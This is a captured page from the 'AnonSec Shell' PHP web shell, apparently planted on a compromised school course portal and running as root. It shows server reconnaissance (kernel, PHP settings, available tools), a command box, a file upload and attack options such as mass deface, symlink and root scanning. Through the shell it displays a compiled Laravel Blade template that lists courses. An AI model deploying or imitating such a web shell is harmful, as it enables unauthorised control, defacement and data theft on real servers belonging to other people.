AnonSec Shell
Server IP :  /  Your IP : 10.244.4.16   [ Reverse IP ]
Web Server : nginx/1.25.3
System : Linux escuela-portal-app-54f56585bc-kst6g 5.15.0-1084-azure #93-Ubuntu SMP Sat Mar 15 14:12:29 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.2.13
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/app/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/app/storage/framework/views/4af6d294f86203459003ca0576b310914d39d969.php
<?php if(isset($cycle)): ?>
    <?php $__currentLoopData = $cycle->courses; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
        <section class="team-section division">
            <div class="container cursoinfo">
                <div class="row">


                    <!-- CURSO IMAGEN -->
                    <div class="col-md-4">
                        <div class="team-3-photo text-center">

                            <!-- IMAGEN CURSO -->
                            <div class="t-3-photo mb-25">
                                <img class="img-fluid" src="<?php echo e($item->imagen); ?>" alt="team-member-foto">
                            </div>

                            <ul style="text-align:left;">
                                <!-- DURACIÓN -->
                                <li><img src="/img/web/iconos_ciclo_interno/Duracion.svg" width="40px"><b>Duración: </b>
                                    <?php echo e($item->duration); ?>

                                </li>
                                <!-- ALIADOS -->
                                <li><img src="/img/web/iconos_ciclo_interno/Aliado.svg" width="40px"><b>Aliados:</b>
                                    <?php echo e($item->nameAlliances()); ?>

                                </li>
                                <!-- CERTIFICADO -->
                                <li><img src="/img/web/iconos_ciclo_interno/Certificado.svg"
                                        width="40px"><b>Certificado:</b> <?php echo e($item->certification); ?></li>
                            </ul>



                        </div>
                    </div> <!-- END CURSO IMAGEN -->


                    <!-- INFO CURSO -->
                    <div class="col-md-8">
                        <div class="team-3-txt pc-45">

                            <!-- TÍTULO CURSO -->
                            <h5>Curso: <?php echo e($item->name); ?></h5>
                            <!-- OBJETIVO -->
                            <p><strong>Objetivo:</strong> <?php echo e($item->data['objectives'] ?? ''); ?></p>
                            <p><strong>Contenido:</strong><?php echo e($item->data['content'] ?? ''); ?></p>

                            <!-- BOTON INSCRIPCIÓN -->
                            <?php
                                $today = \Carbon\Carbon::now();
                            ?>
                            <?php if($item->url && $today->between($item->start_date, $item->end_date)): ?>
                                <p style="text-align:right;"><a href="<?php echo e($item->url); ?>"
                                        class="btn btn-md btn-amarillo tra-black-hover ">Inscríbete</a></p>
                            <?php else: ?>
                                <p style="text-align:right;"><b>Próximamente</b></p>
                            <?php endif; ?>

                        </div>
                    </div> <!-- END INFO CURSO -->


                </div> <!-- End row -->
            </div> <!-- End container -->
        </section> <!-- END CURSO 1 -->
    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
<?php endif; ?>
<?php /**PATH /var/www/app/resources/views/website/pages/partials/_course_cards.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team